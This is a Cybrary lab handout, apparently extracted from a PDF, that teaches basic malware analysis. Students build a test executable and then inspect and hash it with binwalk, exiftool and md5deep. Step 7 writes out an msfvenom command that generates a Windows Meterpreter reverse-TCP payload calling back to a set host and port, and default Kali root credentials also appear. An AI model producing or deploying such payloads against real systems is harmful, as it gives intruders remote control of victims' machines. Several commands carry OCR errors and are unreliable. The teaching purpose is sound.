## CYBRARY

#### Malware Threats

#### Analyze and Classify Malware Lab

**Description:** In this lab, students will analyze a malicious executable file and perform a hash of the file.

**<u>Requirement:</u>** Students will need access to the Cybrary lab environment for this lab.

**<u>Step 1</u>**: Log into your Cybrary account

**Step 2:** Search for the Analyze and Classify Malware lab from CybrScore

**Step 3:** Select the Launch button

**<u>Step 4:</u>** Click the Launch Item button

**<u>Step 5:</u>** Log into the Kali Linux machine by entering the following username and password.

Username: root

Password: toor

**<u>Step 6:</u>** Click the Terminal icon at the top of the Kali desktop.

Brought to you by:

**CYBRARY** | FOR BUSINESS

Develop your team with the **fastest growing catalog** in the cybersecurity industry. Enterprise-grade workforce development management, advanced training features and detailed skill gap and competency analytics.

## СҮВЗАЗҮ

**Step 7:** At the Terminal prompt, type the following command and hit Enter to create the malicious executable file.

msfvenom -a x86 -platform windows -p windows/meterpreter/reverse\_tcp LHOST=192.168.0.100 LPORT=443 -f exe -o maliciousfile.exe

Note: It might take a few minutes to create the file.

**Step 8:** Type Is at the prompt and hit the Enter key to verify the file has been created.

**Step 9:** Type clear at the Terminal prompt and press Enter

**<u>Step 10:</u>** Next, type the following at the Terminal prompt

binwalk -B maliciousfile.exe

Note: This scans the file for common malicious signatures.

**Step 11:** Next, enter the following command at the prompt and press Enter.

binwalk -3 maliciousfile.exe

**<u>Step 12</u>**: Enter the following command and press Enter to see if there are any opcodes.

binwalk - A maliciousfile.exe

Brought to you by:

**CYBRARY** | FOR BUSINESS

Develop your team with the **fastest growing catalog** in the cybersecurity industry. Enterprise-grade workforce development management, advanced training features and detailed skill gap and competency analytics.

### CYBZAZY

Question 1: Do you see any No Operation opcodes? \_\_\_\_\_

**<u>Step 13:</u>** Next, type the following command at the prompt and press Enter.

exiftool maliciousfile.exe

**<u>Step 14:</u>** You will next perform a hash on the malicious file.

**<u>Step 15:</u>** Type the following command and press Enter:

md5deep maliciousfile.exe

# CYBRARY

Brought to you by:

**CYBRARY** | FOR BUSINESS

Develop your team with the **fastest growing catalog** in the cybersecurity industry. Enterprise-grade workforce development management, advanced training features and detailed skill gap and competency analytics.